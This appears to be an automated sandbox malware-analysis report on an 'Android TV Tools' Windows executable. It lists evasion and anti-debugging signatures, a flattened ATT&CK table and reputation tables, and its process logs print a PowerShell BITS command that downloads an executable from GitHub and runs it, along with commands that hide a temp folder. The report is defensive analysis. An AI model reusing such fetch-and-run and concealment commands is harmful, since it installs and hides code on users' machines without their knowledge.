Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeCode function: 0_2_004036D10_2_004036D1
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeCode function: 0_2_00404D370_2_00404D37
Uses ping.exe to sleep
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping google.com -n 1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping google.com -n 1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5647Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4123Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4768Thread sleep count: 5647 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6628Thread sleep count: 4123 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6388Thread sleep time: -9223372036854770s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6052Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: svchost.exe, 0000000C.00000002.3239610476.000001C0D9A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3240534812.000001C0DF253000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeAPI call chain: ExitProcess graph end nodegraph_0-7159
Source: C:\Users\user\Desktop\Android TV Tools - Aux Files\cmdmax.exeAPI call chain: ExitProcess graph end nodegraph_14-1880
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Found API chain indicative of debugger detection
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeDebugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleepgraph_0-7470
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeCode function: 0_2_0040B641 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040B641
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\svchost.exeFile created: BITC7F8.tmp.12.drJump to dropped file
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\afolder" mkdir "C:\Users\user\AppData\Local\Temp\afolder"Jump to behavior
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\ytmp" mkdir "C:\Users\user\AppData\Local\Temp\ytmp"Jump to behavior
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c attrib +h C:\Users\user\AppData\Local\Temp\ytmpJump to behavior
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c if exist "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat" del "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat"Jump to behavior
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c if exist "C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe" del "C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe"Jump to behavior
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat "C:\Users\user\Desktop\Android TV Tools v3_ES.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h C:\Users\user\AppData\Local\Temp\ytmpJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping google.com -n 1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\Android TV Tools - Aux Files\cmdmax.exe "Android TV Tools - Aux Files\cmdmax.exe" 20 234 120 31 120 9999Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeCode function: 0_2_00406444 EntryPoint,GetVersion,GetCommandLineA,0_2_00406444

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts2
Command and Scripting Interpreter		1
BITS Jobs		11
Process Injection		1
Masquerading		OS Credential Dumping211
Security Software Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts11
Native API		1
Scripting		1
DLL Side-Loading		131
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Exploitation for Client Execution		1
DLL Side-Loading		Logon Script (Windows)1
BITS Jobs		Security Account Manager131
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
Remote System Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials1
System Network Configuration Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync22
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447534 Sample: Android TV Tools v3_ES.exe Startdate: 25/05/2024 Architecture: WINDOWS Score: 88 40 github.com 2->40 42 objects.githubusercontent.com 2->42 44 google.com 2->44 54 Multi AV Scanner detection for submitted file 2->54 56 Found API chain indicative of debugger detection 2->56 58 Sigma detected: Invoke-Obfuscation CLIP+ Launcher 2->58 60 2 other signatures 2->60 8 Android TV Tools v3_ES.exe 3 2->8         started        11 svchost.exe 1 1 2->11         started        signatures3 process4 dnsIp5 34 C:\Users\user\AppData\Local\...\tmp8939.bat, DOS 8->34 dropped 15 cmd.exe 2 8->15         started        18 cmd.exe 2 8->18         started        20 cmd.exe 1 8->20         started        22 4 other processes 8->22 46 github.com 140.82.121.4, 443, 49707, 49709 GITHUBUS United States 11->46 48 objects.githubusercontent.com 185.199.108.133, 443, 49708, 49710 FASTLYUS Netherlands 11->48 50 127.0.0.1 unknown unknown 11->50 36 C:\Users\user\Desktop\...\cmdmax.exe (copy), PE32 11->36 dropped 38 C:\Users\user\Desktop\...\BITC7F8.tmp, PE32 11->38 dropped 66 Benign windows process drops PE files 11->66 file6 signatures7 process8 signatures9 68 Uses ping.exe to sleep 15->68 24 powershell.exe 27 15->24         started        27 PING.EXE 1 15->27         started        30 cmdmax.exe 1 15->30         started        70 Uses ping.exe to check the status of other devices and networks 18->70 32 attrib.exe 1 20->32         started        process10 dnsIp11 62 Powershell uses Background Intelligent Transfer Service (BITS) 24->62 64 Loading BitLocker PowerShell Module 24->64 52 google.com 142.250.186.46 GOOGLEUS United States 27->52 signatures12

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Android TV Tools v3_ES.exe12%ReversingLabs
Android TV Tools v3_ES.exe14%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\Desktop\Android TV Tools - Aux Files\BITC7F8.tmp2%ReversingLabs
C:\Users\user\Desktop\Android TV Tools - Aux Files\cmdmax.exe (copy)2%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
google.com1%VirustotalBrowse
github.com0%VirustotalBrowse
objects.githubusercontent.com1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://g.live.com/odclientsettings/ProdV2.C:0%URL Reputationsafe
https://ipinfo.io0%URL Reputationsafe
https://g.live.com/odclientsettings/Prod/C:0%URL Reputationsafe
https://f-droid.org/repo/news.androidtv.launchonboot_12.apk0%Avira URL Cloudsafe
https://atvlauncher.trekgonewild.de/0%Avira URL Cloudsafe
https://www.androidpolice.com/2021/01/30/how-to-remap-remote-buttons-take-screenshot-chromecast-with0%Avira URL Cloudsafe
https://kutt.it/stn_bridge_atv0%Avira URL Cloudsafe
https://www.tdtchannels.com/listas0%Avira URL Cloudsafe
https://github.com/0x192/universal-android-debloater/releases/download/%ver_debloater%/uad_gui-windo0%Avira URL Cloudsafe
https://github.com/0x192/universal-android-debloater/wiki/FAQ0%Avira URL Cloudsafe
https://www.tdtchannels.com/listas0%VirustotalBrowse
https://kutt.it/stn_bridge_atv1%VirustotalBrowse
https://iptv-org.github.io/0%Avira URL Cloudsafe
https://www.androidpolice.com/2021/01/30/how-to-remap-remote-buttons-take-screenshot-chromecast-with0%VirustotalBrowse
https://github.com/c500%Avira URL Cloudsafe
https://www.reddit.com/r/AndroidTV/0%Avira URL Cloudsafe
https://github.com/0x192/universal-android-debloater/wiki/FAQ0%VirustotalBrowse
https://www.reddit.com/r/AndroidTV/0%VirustotalBrowse
https://github.com/0x192/universal-android-debloater/releases/download/%ver_debloater%/uad_gui-windo0%VirustotalBrowse
https://atvlauncher.trekgonewild.de/0%VirustotalBrowse
https://www.androidtv-guide.com/0%VirustotalBrowse
https://iptv-org.github.io/0%VirustotalBrowse
https://www.androidtv-guide.com/0%Avira URL Cloudsafe
https://xdaforums.com/attachments/google-installer_3-0-apk.6052043/0%Avira URL Cloudsafe
https://www.reddit.com/r/AndroidTV/comments/1ajkxbk/tool_allinone_tool_for_windows_android_tv_tools_0%Avira URL Cloudsafe
https://gitlab.com/AuroraOSS/AuroraStore/uploads/ac32503aee88c6d1067dad57f3f92e09/AuroraStore_4.3.5.0%Avira URL Cloudsafe
https://github.com:443/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe0%Avira URL Cloudsafe
https://f-droid.org/repo/news.androidtv.launchonboot_12.apk0%VirustotalBrowse
https://play.google.com/store/apps/details?id=com.tdtchannels.player0%Avira URL Cloudsafe
https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe0%Avira URL Cloudsafe
https://www.reddit.com/r/AndroidTV/comments/1ajkxbk/tool_allinone_tool_for_windows_android_tv_tools_0%VirustotalBrowse
https://api.github.com/repos/mirfatif/PermissionManagerX/releases/latest0%Avira URL Cloudsafe
https://xdaforums.com/attachments/aapt-arm-pie-zip.6053069/0%Avira URL Cloudsafe
https://play.google.com/store/apps/details?id=com.tdtchannels.player0%VirustotalBrowse
https://play.google.com/store/apps/details?id=flar2.homebutton0%Avira URL Cloudsafe
https://xdaforums.com/attachments/google-installer_3-0-apk.6052043/2%VirustotalBrowse
https://gitlab.com/AuroraOSS/AuroraStore/uploads/ac32503aee88c6d1067dad57f3f92e09/AuroraStore_4.3.5.0%VirustotalBrowse
https://github.com:443/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe0%VirustotalBrowse
https://api.github.com/repos/K3V1991/ADB-and-FastbootPlusPlus/releases/latest0%Avira URL Cloudsafe
https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe0%VirustotalBrowse
https://api.github.com/repos/mirfatif/PermissionManagerX/releases/latest0%VirustotalBrowse
https://api.github.com/repos/codefaktor/FTVLaunchX/releases/latest0%Avira URL Cloudsafe
https://github.com/0%Avira URL Cloudsafe
https://github.com/Genymobile/scrcpy/blob/master/doc/shortcuts.md#shortcuts0%Avira URL Cloudsafe
https://api.github.com/repos/spocky/miproja1/releases/latest0%Avira URL Cloudsafe
https://play.google.com/store/apps/details?id=flar2.homebutton0%VirustotalBrowse
https://github.com/K3V1991/ADB-and-FastbootPlusPlus/releases/download/%ver_adb%/ADB-and-Fastboot0%Avira URL Cloudsafe
https://api.github.com/repos/codefaktor/FTVLaunchX/releases/latest0%VirustotalBrowse
https://github.com/0%VirustotalBrowse
https://api.github.com/repos/K3V1991/ADB-and-FastbootPlusPlus/releases/latest0%VirustotalBrowse
https://objects.githubusercontent.com/github-production-release-asset-2e65be/50417431/6e51c424-c3ca-0%Avira URL Cloudsafe
https://mirfatif.github.io/PermissionManagerX/0%Avira URL Cloudsafe
https://github.com/Genymobile/scrcpy/blob/master/doc/shortcuts.md#shortcuts0%VirustotalBrowse
https://api.github.com/repos/0x192/universal-android-debloater/releases0%Avira URL Cloudsafe
https://api.github.com/repos/spocky/miproja1/releases/latest0%VirustotalBrowse
https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exeAC:0%Avira URL Cloudsafe
https://xdaforums.com/attachments/aapt-arm-pie-zip.6053069/0%VirustotalBrowse
https://xdaforums.com/attachments/countries-list-txt.6067313/0%Avira URL Cloudsafe
https://github.com/K3V1991/ADB-and-FastbootPlusPlus/releases/download/%ver_adb%/ADB-and-Fastboot0%VirustotalBrowse
https://xdaforums.com/attachments/google-play-store_v38-7-29-apk.6052033/0%Avira URL Cloudsafe
https://www.adslzone.net/reportajes/tv-streaming/que-es-tecnologia-iptv/#395576-que-son-las-listas-i0%Avira URL Cloudsafe
https://xdaforums.com/attachments/google-tv-home_1-0-591121582-apk.6051727/0%Avira URL Cloudsafe
https://mirfatif.github.io/PermissionManagerX/0%VirustotalBrowse
https://kutt.it/stn_bridge_amazon0%Avira URL Cloudsafe
https://api.github.com/repos/0x192/universal-android-debloater/releases0%VirustotalBrowse
https://github.com/codefaktor/FTVLaunchX/releases/download/v1.0.1/FTVLaunchX-1.0.1.apk0%Avira URL Cloudsafe
https://github.com/0x192/universal-android-debloater#universal-android-debloater-gui0%Avira URL Cloudsafe
https://www.adslzone.net/reportajes/tv-streaming/que-es-tecnologia-iptv/#395576-que-son-las-listas-i0%VirustotalBrowse
https://adguard.com/adguard-android-tv/overview.html0%Avira URL Cloudsafe
https://xdaforums.com/attachments/google-play-store_v38-7-29-apk.6052033/2%VirustotalBrowse
https://xdaforums.com/attachments/google-tv-home_1-0-591121582-apk.6051727/2%VirustotalBrowse
https://api.github.com/repos/realOxy/M3UAndroid/releases/latest0%Avira URL Cloudsafe
https://xdaforums.com/t/tool-all-in-one-tool-for-windows-android-tv-tools-v2.4648239/0%Avira URL Cloudsafe
https://play.google.com/store/apps/details?id=%%%%j0%Avira URL Cloudsafe
https://9to5google.com/guides/android-tv/0%Avira URL Cloudsafe
https://xdaforums.com/attachments/countries-list-txt.6067313/0%VirustotalBrowse
https://play.google.com/store/apps/details?id=com.neilturner.aerialviews0%Avira URL Cloudsafe
https://xdaforums.com/attachments/wifi-pro-ftp-server_v1-9-5-build-74-apk.5924749/0%Avira URL Cloudsafe
https://gitlab.com/flauncher/flauncher/-/releases/0.18.0/downloads/flauncher-0.18.0.apk0%Avira URL Cloudsafe
https://play.google.com/store/apps/details?id=org.xbmc.kodi0%Avira URL Cloudsafe
https://xdaforums.com/t/how-to-prepare-smartwatch-for-advanced-functions.4511103/0%Avira URL Cloudsafe
https://play.google.com/store/apps/details?id=ar.tvplayer.tv0%Avira URL Cloudsafe
https://github.com/Genymobile/scrcpy0%Avira URL Cloudsafe
https://api.github.com/repos/Genymobile/scrcpy/releases/latest0%Avira URL Cloudsafe
https://github.com/codefaktor/FTVLaunchX/blob/develop/README.md0%Avira URL Cloudsafe
https://smarttubeapp.github.io/0%Avira URL Cloudsafe
http://crl.ver)0%Avira URL Cloudsafe
https://github.com/Genymobile/scrcpy/releases/download/%ver_scrcpy%/scrcpy-win%arquitectura_windows%0%Avira URL Cloudsafe
https://github.com/Free-TV/IPTV?tab=readme-ov-file#free-tv0%Avira URL Cloudsafe
https://kutt.it/stn_beta0%Avira URL Cloudsafe
https://play.google.com/store/apps/details?id=com.wiseplay0%Avira URL Cloudsafe
https://xdaforums.com/attachments/google-play-apk.6050959/0%Avira URL Cloudsafe
https://xdaforums.com/c/android-tv.4276/0%Avira URL Cloudsafe
https://apkins.aptoide.com/AptoideTV-5.1.2.apk0%Avira URL Cloudsafe
https://github.com/K3V1991/ADB-and-FastbootPlusPlus0%Avira URL Cloudsafe
https://objects.githubusercontent.com:4430%Avira URL Cloudsafe
https://github.com/iptv-org/iptv?tab=readme-ov-file#playlists0%Avira URL Cloudsafe
http://agrd.io/tvapk0%Avira URL Cloudsafe
https://objects.githubusercontent.com/0%Avira URL Cloudsafe
https://mirfatif.github.io/PermissionManagerX/help/en/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
google.com
142.250.186.46
truefalseunknown
github.com
140.82.121.4
truetrueunknown
objects.githubusercontent.com
185.199.108.133
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exetrue
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://atvlauncher.trekgonewild.de/tmp8939.bat.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
